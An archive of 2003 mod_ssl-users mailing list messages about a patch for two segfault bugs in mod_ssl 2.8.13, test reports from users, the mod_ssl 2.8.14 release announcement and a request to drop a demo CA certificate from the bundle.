	id 7A097286CA; Fri, 21 Mar 2003 13:34:49 +0100 (CET)
Date: Fri, 21 Mar 2003 13:34:49 +0100
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: mod_ssl/2.8.13 and php
Message-ID: <20030321123449.GA71749@engelschall.com>
References: <20030320174228.72608.qmail@web40305.mail.yahoo.com> <3E7A1682.5050301@pydo.org> <20030321113036.GA62406@engelschall.com> <20030321113710.GC20482@redhat.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030321113710.GC20482@redhat.com>
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Mar 21, 2003, Joe Orton wrote:

> On Fri, Mar 21, 2003 at 12:30:36PM +0100, Ralf S. Engelschall wrote:
> > -        if ((xs = SSL_get_certificate(ssl)) != NULL)
> > +        if ((xs = SSL_get_certificate(ssl)) != NULL) {
> >              result = ssl_var_lookup_ssl_cert(p, xs, var+7);
> > +            X509_free(xs);
> > +        }
> >      }
>
> That isn't safe, SSL_get_certificate doesn't increase the refcount on
> the certificate (unlike SSL_peer_get_certificate).

Ops, great catch! Yes, you're right, I was not aware of this subtle
difference. Will be fixed.
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 14:30:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C5CD52AA02C; Fri, 21 Mar 2003 14:30:24 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fyi.jobware.net (fyi.jobware.net [80.66.0.154])
	by master.modssl.org (Postfix) with ESMTP id 2BCDF2AA01A
	for ; Fri, 21 Mar 2003 14:30:23 +0100 (CET)
Received: from lotus.jobware.net (guardian.jobware.net [80.66.7.98])
	by fyi.jobware.net (8.12.8/8.12.8) with ESMTP id h2LDUF1B016591
	for ; Fri, 21 Mar 2003 14:30:15 +0100
Received: from lotus.jobware.net (localhost [127.0.0.1])
	by lotus.jobware.net (8.12.8/8.12.8) with ESMTP id h2LDUFOw024559
	for ; Fri, 21 Mar 2003 14:30:15 +0100
Received: from localhost (burkhard@localhost)
	by lotus.jobware.net (8.12.8/8.12.8/Submit) with ESMTP id h2LDUFZb024556
	for ; Fri, 21 Mar 2003 14:30:15 +0100
Date: Fri, 21 Mar 2003 14:30:14 +0100 (CET)
From: Burkhard Ulrich 
To: modssl-users@modssl.org
Subject: Re: [PATCH] Segfaults in 2.8.13 (was: Re: mod_ssl/2.8.13 and php)
In-Reply-To: <20030321124724.GB71749@engelschall.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Burkhard Ulrich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi,

this works on linux 2.2.16 and linux 2.4.19

Thanks

Burkhard

On Fri, 21 Mar 2003, Ralf S. Engelschall wrote:

> On Fri, Mar 21, 2003, Ralf S. Engelschall wrote:
> 
> > > I can see the same segmentation fault :
> > [...]
> 
> Ok, can the people who are able to reproduce the segfault problem,
> please apply the following patch, retry it and give feedback? I think
> these two bugfixes should fix the problem now. If yes, I'll release
> mod_ssl 2.8.14 with it. Thanks for your help.
> 
> Index: ssl_engine_kernel.c
> ===================================================================
> RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_kernel.c,v
> retrieving revision 1.136
> diff -u -d -r1.136 ssl_engine_kernel.c
> --- ssl_engine_kernel.c	19 Nov 2002 13:57:01 -0000	1.136
> +++ ssl_engine_kernel.c	21 Mar 2003 12:39:47 -0000
> @@ -1048,13 +1048,15 @@
>                          "Re-negotiation handshake failed: Client verification failed");
>                  return FORBIDDEN;
>              }
> +            cert = SSL_get_peer_certificate(ssl);
>              if (   dc->nVerifyClient == SSL_CVERIFY_REQUIRE
> -                && (cert = SSL_get_peer_certificate(ssl)) == NULL) {
> +                && cert == NULL) {
>                  ssl_log(r->server, SSL_LOG_ERROR,
>                          "Re-negotiation handshake failed: Client certificate missing");
> -                X509_free(cert);
>                  return FORBIDDEN;
>              }
> +            if (cert != NULL)
> +                X509_free(cert);
>          }
>      }
> 
> Index: ssl_engine_vars.c
> ===================================================================
> RCS file: /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_vars.c,v
> retrieving revision 1.53
> diff -u -d -r1.53 ssl_engine_vars.c
> --- ssl_engine_vars.c	29 Oct 2002 13:00:46 -0000	1.53
> +++ ssl_engine_vars.c	21 Mar 2003 12:40:12 -0000
> @@ -322,7 +322,9 @@
>      else if (ssl != NULL && strlen(var) > 7 && strcEQn(var, "SERVER_", 7)) {
>          if ((xs = SSL_get_certificate(ssl)) != NULL) {
>              result = ssl_var_lookup_ssl_cert(p, xs, var+7);
> -            X509_free(xs);
> +            /* SSL_get_certificate() as of OpenSSL 0.9.7a does not increment
> +               the reference count the same way SSL_get_peer_certificate does,
> +               so no need to X509_free(xs) the stuff here. */
>          }
>      }
>      return result;
> 
>                                        Ralf S. Engelschall
>                                        rse@engelschall.com
>                                        www.engelschall.com
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 14:34:28 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 722472AA050; Fri, 21 Mar 2003 14:34:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ejk.cso.uiuc.edu (ejk.cso.uiuc.edu [130.126.113.8])
	by master.modssl.org (Postfix) with SMTP id D63AF2AA04B
	for ; Fri, 21 Mar 2003 14:34:26 +0100 (CET)
Received: (qmail 15328 invoked from network); 21 Mar 2003 13:34:22 -0000
Received: from ejk.cso.uiuc.edu (130.126.113.8)
  by ejk.cso.uiuc.edu with SMTP; 21 Mar 2003 13:34:21 -0000
Date: Fri, 21 Mar 2003 07:34:21 -0600
From: Ed Kubaitis 
To: modssl-users@modssl.org
Subject: Re: [PATCH] Segfaults in 2.8.13 (was: Re: mod_ssl/2.8.13 and php)
Message-ID: <76420000.1048253661@localhost.localdomain>
In-Reply-To: <20030321124724.GB71749@engelschall.com>
References: <20030320174228.72608.qmail@web40305.mail.yahoo.com>
 <3E7A1682.5050301@pydo.org> <20030321113036.GA62406@engelschall.com>
 <20030321124724.GB71749@engelschall.com>
X-Mailer: Mulberry/3.0.1 (Linux/x86)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-Spam-Status: No, hits=-1.3 required=5.0
	tests=IN_REP_TO,QUOTED_EMAIL_TEXT,REFERENCES,SPAM_PHRASE_02_03
	version=2.43
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ed Kubaitis 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--"Ralf S. Engelschall"  wrote:

> On Fri, Mar 21, 2003, Ralf S. Engelschall wrote:
>
>> > I can see the same segmentation fault :
>> [...]
>
> Ok, can the people who are able to reproduce the segfault problem,
> please apply the following patch, retry it and give feedback? I think
> these two bugfixes should fix the problem now. If yes, I'll release
> mod_ssl 2.8.14 with it. Thanks for your help.
>

The patch fixed the problem for me (no php, RH 7.3.)

--
Ed Kubaitis - ejk@uiuc.edu
CITES/STS - University of Illinois at Urbana-Champaign


> Index: ssl_engine_kernel.c
> ===================================================================
> RCS file:
> /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_kernel.c,v
> retrieving revision 1.136
> diff -u -d -r1.136 ssl_engine_kernel.c
> --- ssl_engine_kernel.c	19 Nov 2002 13:57:01 -0000	1.136
> +++ ssl_engine_kernel.c	21 Mar 2003 12:39:47 -0000
> @@ -1048,13 +1048,15 @@
>                          "Re-negotiation handshake failed: Client
> verification failed");                  return FORBIDDEN;
>              }
> +            cert = SSL_get_peer_certificate(ssl);
>              if (   dc->nVerifyClient == SSL_CVERIFY_REQUIRE
> -                && (cert = SSL_get_peer_certificate(ssl)) == NULL) {
> +                && cert == NULL) {
>                  ssl_log(r->server, SSL_LOG_ERROR,
>                          "Re-negotiation handshake failed: Client
> certificate missing"); -                X509_free(cert);
>                  return FORBIDDEN;
>              }
> +            if (cert != NULL)
> +                X509_free(cert);
>          }
>      }
>
> Index: ssl_engine_vars.c
> ===================================================================
> RCS file:
> /e/modssl/cvs/mod_ssl/pkg.apache/src/modules/ssl/ssl_engine_vars.c,v
> retrieving revision 1.53
> diff -u -d -r1.53 ssl_engine_vars.c
> --- ssl_engine_vars.c	29 Oct 2002 13:00:46 -0000	1.53
> +++ ssl_engine_vars.c	21 Mar 2003 12:40:12 -0000
> @@ -322,7 +322,9 @@
>      else if (ssl != NULL && strlen(var) > 7 && strcEQn(var, "SERVER_",
> 7)) {          if ((xs = SSL_get_certificate(ssl)) != NULL) {
>              result = ssl_var_lookup_ssl_cert(p, xs, var+7);
> -            X509_free(xs);
> +            /* SSL_get_certificate() as of OpenSSL 0.9.7a does not
> increment +               the reference count the same way
> SSL_get_peer_certificate does, +               so no need to
> X509_free(xs) the stuff here. */
>          }
>      }
>      return result;
>
>                                        Ralf S. Engelschall
>                                        rse@engelschall.com
>                                        www.engelschall.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 15:17:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B16462AA02C; Fri, 21 Mar 2003 15:17:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bastion.pydo.net (bastion.pydo.net [62.212.97.116])
	by master.modssl.org (Postfix) with ESMTP id 10DE52AA02B
	for ; Fri, 21 Mar 2003 15:17:25 +0100 (CET)
Received: by bastion.pydo.net (Postfix, from userid 10025)
	id 0CFC94C25D; Fri, 21 Mar 2003 15:17:21 +0100 (CET)
Received: from pydo.org (univers2.pydo.org [192.168.0.4])
	(using TLSv1 with cipher RC4-MD5 (128/128 bits))
	(No client certificate requested)
	by bastion.pydo.net (Postfix) with ESMTP id A985C4C25C
	for ; Fri, 21 Mar 2003 15:17:11 +0100 (CET)
Message-ID: <3E7B1EF8.2080909@pydo.org>
Date: Fri, 21 Mar 2003 15:17:28 +0100
From: Artur Pydo 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: fr-fr, fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [PATCH] Segfaults in 2.8.13 (was: Re: mod_ssl/2.8.13 and php)
References: <20030320174228.72608.qmail@web40305.mail.yahoo.com> <3E7A1682.5050301@pydo.org> <20030321113036.GA62406@engelschall.com> <20030321124724.GB71749@engelschall.com>
In-Reply-To: <20030321124724.GB71749@engelschall.com>
X-Enigmail-Version: 0.71.0.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Spam-Status: No, hits=-23.6 required=5.0
	tests=AWL,EMAIL_ATTRIBUTION,IN_REP_TO,QUOTED_EMAIL_TEXT,
	      REFERENCES,REPLY_WITH_QUOTES,USER_AGENT_MOZILLA_UA
	autolearn=ham	version=2.50
X-Spam-Level: 
X-Spam-Checker-Version: SpamAssassin 2.50 (1.173-2003-02-20-exp)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Artur Pydo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Ralf S. Engelschall wrote:
> Ok, can the people who are able to reproduce the segfault problem,
> please apply the following patch, retry it and give feedback? I think
> these two bugfixes should fix the problem now. If yes, I'll release
> mod_ssl 2.8.14 with it. Thanks for your help.

That's ok with static and DSO apache build on :

FreeBSD 4.8-STABLE
Apache 1.3.27
Openssl 0.9.7a
Modssl 2.8.13 + provided patch
PHP 4.3.1 and PHP 4.3.2RC1

Thanks !

-- 

Best regards,

Artur Pydo.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 15:18:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 380A42AA053; Fri, 21 Mar 2003 15:18:35 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from fyi.jobware.net (fyi.jobware.net [80.66.0.154])
	by master.modssl.org (Postfix) with ESMTP id 2DA142AA051
	for ; Fri, 21 Mar 2003 15:18:34 +0100 (CET)
Received: from lotus.jobware.net (guardian.jobware.net [80.66.7.98])
	by fyi.jobware.net (8.12.8/8.12.8) with ESMTP id h2LEIU1B006881
	for ; Fri, 21 Mar 2003 15:18:30 +0100
Received: from lotus.jobware.net (localhost [127.0.0.1])
	by lotus.jobware.net (8.12.8/8.12.8) with ESMTP id h2LEIUOw014069
	for ; Fri, 21 Mar 2003 15:18:30 +0100
Received: from localhost (burkhard@localhost)
	by lotus.jobware.net (8.12.8/8.12.8/Submit) with ESMTP id h2LEIU7i014066
	for ; Fri, 21 Mar 2003 15:18:30 +0100
Date: Fri, 21 Mar 2003 15:18:30 +0100 (CET)
From: Burkhard Ulrich 
To: modssl-users@modssl.org
Subject: Re: Re: [PATCH] Segfaults in 2.8.13 (was: Re: mod_ssl/2.8.13 and
 php)
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Burkhard Ulrich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi again,

I also tested it sucessfully with linux 2.0.35, linux 2.2.19 and with 
linux 2.2.20

Greetings

Burkhard


> 
> Hi,
> 
> this works on linux 2.2.16 and linux 2.4.19
> 
> Thanks
> 
> Burkhard
> 
> On Fri, 21 Mar 2003, Ralf S. Engelschall wrote:
> 
> > On Fri, Mar 21, 2003, Ralf S. Engelschall wrote:
> > 
> > > > I can see the same segmentation fault :
> > > [...]
> > 
> > Ok, can the people who are able to reproduce the segfault problem,
> > please apply the following patch, retry it and give feedback? I think
> > these two bugfixes should fix the problem now. If yes, I'll release
> > mod_ssl 2.8.14 with it. Thanks for your help.

...

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 15:26:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B9D1B2AA04D; Fri, 21 Mar 2003 15:26:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP
	id 1D1792AA02B; Fri, 21 Mar 2003 15:26:46 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 0D3604CE530; Fri, 21 Mar 2003 15:26:46 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id DCDBD286CA; Fri, 21 Mar 2003 15:26:25 +0100 (CET)
Date: Fri, 21 Mar 2003 15:26:25 +0100
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.14-1.3.27
Message-ID: <20030321142625.GA77243@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry, mod_ssl 2.8.13 introduced two nasty bugs which let the server
crash. This is now fixed with mod_ssl 2.8.14 together with one more
long-standing crash bug related to the SHMHT session cache. Please
upgrade to this latest mod_ssl 2.8 version for Apache 1.3. Thanks.

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.14 (18-Mar-2002 to 21-Mar-2003)

   *) Fixed logic in the destruction of a temporary certificate
      structure and this way avoid a crash due to freeing NULL object.

   *) Removed one newly introduced X509_free() call in the context of
      SSL_get_certificate(), because this function does not increment a
      reference count (although SSL_get_peer_certificate() does).

   *) Fixed hash-table based shared memory session cache (shmht)
      implementation by making sure that the underlying hash table
      library does not crash if memory cannot be allocated.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 16:08:51 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4AC652AA046; Fri, 21 Mar 2003 16:08:51 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id C26622AA01A
	for ; Fri, 21 Mar 2003 16:08:49 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h2LFH0v07917;
	Fri, 21 Mar 2003 15:17:20 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Fri, 21 Mar 2003 15:08:00 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F27E6@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org, openssl-users@openssl.org
Subject: Wildcard certificates from GlobalSign
Date: Fri, 21 Mar 2003 15:07:58 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've just received an email from GlobalSign that makes it appear that
Wildcard certificates are still financially viable. If anyone wants details
can they contact me off the list.

Thank you.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

A world of difference - in the UK, 37 million people put their faith on the
last census as "Christian". In Saudi Arabia, this answer would carry a death
sentence for any Saudi.


- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 16:15:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CFC382AA02C; Fri, 21 Mar 2003 16:15:54 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web40301.mail.yahoo.com (web40301.mail.yahoo.com [66.218.78.80])
	by master.modssl.org (Postfix) with SMTP id 122EF2AA01A
	for ; Fri, 21 Mar 2003 16:15:53 +0100 (CET)
Message-ID: <20030321151548.10193.qmail@web40301.mail.yahoo.com>
Received: from [200.188.168.56] by web40301.mail.yahoo.com via HTTP; Fri, 21 Mar 2003 12:15:48 ART
Date: Fri, 21 Mar 2003 12:15:48 -0300 (ART)
From: =?iso-8859-1?q?Jazz?= 
Subject: Re: [PATCH] Segfaults in 2.8.13 (was: Re: mod_ssl/2.8.13 and php)
To: modssl-users@modssl.org
In-Reply-To: <20030321124724.GB71749@engelschall.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?q?Jazz?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

    Hi All,

    It is OK with:

    Solaris 2.6/Sparc
    Apache 1.3.27 (DSO)
    Php 4.2.3
    OpenSSL 0.9.6i
    Mod_SSL 2.8.14

    Nice weekend for everybody!

    JAZZ

_______________________________________________________________________
Busca Yahoo!
O serviço de busca mais completo da Internet. O que você pensar o Yahoo! encontra.
http://br.busca.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 21 21:06:52 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0B3052AA02C; Fri, 21 Mar 2003 21:06:52 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mystic1.trustcenter.de (mystic1.trustcenter.de [193.194.157.34])
	by master.modssl.org (Postfix) with ESMTP id A9A582AA02B
	for ; Fri, 21 Mar 2003 21:05:27 +0100 (CET)
Received: (from root@localhost)
	by mystic1.trustcenter.de (8.10.2+Sun/8.10.2) id h2LK3fC16006
	for ; Fri, 21 Mar 2003 21:03:41 +0100 (MET)
Received: from venus.trustcenter.de(192.168.202.4) by mystic1.trustcenter.de via csmap (V6.0)
	id srcAAAG1aOqF; Fri, 21 Mar 03 21:03:40 +0100
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.11.0/8.11.0) with ESMTP id h2LK5MM21148;
	Fri, 21 Mar 2003 21:05:22 +0100 (MET)
Message-ID: <3E7B7082.6090104@trustcenter.de>
Date: Fri, 21 Mar 2003 21:05:22 +0100
From: =?ISO-8859-1?Q?G=F6tz_Babin-Ebell?= 
Organization: TC TrustCenter AG
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021130
X-Accept-Language: de-de, de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: [ANNOUNCE] mod_ssl 2.8.14-1.3.27
References: <20030321142625.GA77243@engelschall.com>
In-Reply-To: <20030321142625.GA77243@engelschall.com>
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms070306000100030607000403"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?G=F6tz_Babin-Ebell?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms070306000100030607000403
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hello Ralf,

Ralf S. Engelschall wrote:
> Sorry, mod_ssl 2.8.13 introduced two nasty bugs which let the server
> crash. This is now fixed with mod_ssl 2.8.14 together with one more
> long-standing crash bug related to the SHMHT session cache. Please
> upgrade to this latest mod_ssl 2.8 version for Apache 1.3. Thanks.

I hav'nt checked but:

if the file pkg.sslcfg/ca-bundle.crt
still contains the certificate

TC TrustCenter, Germany, Class 0 CA

Please remove it !

It is a DEMO certificate and was never intended
to be in any list of trusted CA certificates.


Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms070306000100030607000403
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIIkDCC
BEQwggOtoAMCAQICDwCQHgAAAAJOQu0jEgf3pTANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
BhMCREUxEDAOBgNVBAgTB0hhbWJ1cmcxEDAOBgNVBAcTB0hhbWJ1cmcxOjA4BgNVBAoTMVRD
IFRydXN0Q2VudGVyIGZvciBTZWN1cml0eSBpbiBEYXRhIE5ldHdvcmtzIEdtYkgxIjAgBgNV
BAsTGVRDIFRydXN0Q2VudGVyIENsYXNzIDMgQ0ExKTAnBgkqhkiG9w0BCQEWGmNlcnRpZmlj
YXRlQHRydXN0Y2VudGVyLmRlMB4XDTAzMDIxMDE0NDI1MFoXDTA0MDIxMDE0NDI1MFowgaox
CzAJBgNVBAYTAkRFMRAwDgYDVQQIEwdIYW1idXJnMRAwDgYDVQQHEwdIYW1idXJnMRowGAYD
VQQKExFUQyBUcnVzdENlbnRlciBBRzEUMBIGA1UECxMLRW50d2lja2x1bmcxGjAYBgNVBAMT
EUdvZXR6IEJhYmluLUViZWxsMSkwJwYJKoZIhvcNAQkBFhpiYWJpbi1lYmVsbEB0cnVzdGNl
bnRlci5kZTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALB6adN6EChrpAbT5KV1
ceRRIDAoGnz2gsBoFI2BwJLS+RpuIZfdJOepm4crg3X6LXrMKwSF/lshFeHrVPtLzabgLGyF
SujsJP0z3u7f4XNYCGHl4UbyPkYboIP9GC/DRtsknO1YfJUy/4yKBG4VjJ4AP6vZTEQey6jm
xelsK2ek4vwRfUjs/z9UcZmtj4ipiHP6IqFyydDTLarn1jWHUu2zFnJzryZ6mXdOUPihCOFG
D+c1KFksZ1VscgDpKygTQcIg/VItmbeFkhOj9IkboOyiVKvvfhujlxmdm9ACt22MjMrB0RAb
9TR1DgXlyofwykKAK+GM8Cu8jcKaJjvfhaMCAwEAAaOB0zCB0DAMBgNVHRMBAf8EAjAAMA4G
A1UdDwEB/wQEAwIF4DA+BglghkgBhvhCAQgEMRYvaHR0cDovL3d3dy50cnVzdGNlbnRlci5k
ZS9ndWlkZWxpbmVzL2luZGV4Lmh0bWwwEQYJYIZIAYb4QgEBBAQDAgWgMF0GCWCGSAGG+EIB
AwRQFk5odHRwczovL3d3dy50cnVzdGNlbnRlci5kZS9jZ2ktYmluL2NoZWNrLXJldi5jZ2kv
OTAxRTAwMDAwMDAyNEU0MkVEMjMxMjA3RjdBNT8wDQYJKoZIhvcNAQEFBQADgYEAObOwuCFG
0HmVvCm8llpJ3qsBqtZgFyUT0wuz8JG6CZjHn5lwvOg+8m8huKrE5oGEQIo9EwLcFLDNVsxB
CiwjX2juU3JQl2Hs2smUyHkOqg+W0COetRp+PcDAk4hk0Mth5A3bDy3FrzyhbjpYjAZTvnsY
9+QYmJm5cGWBJK9I7kIwggREMIIDraADAgECAg8AkB4AAAACTkLtIxIH96UwDQYJKoZIhvcN
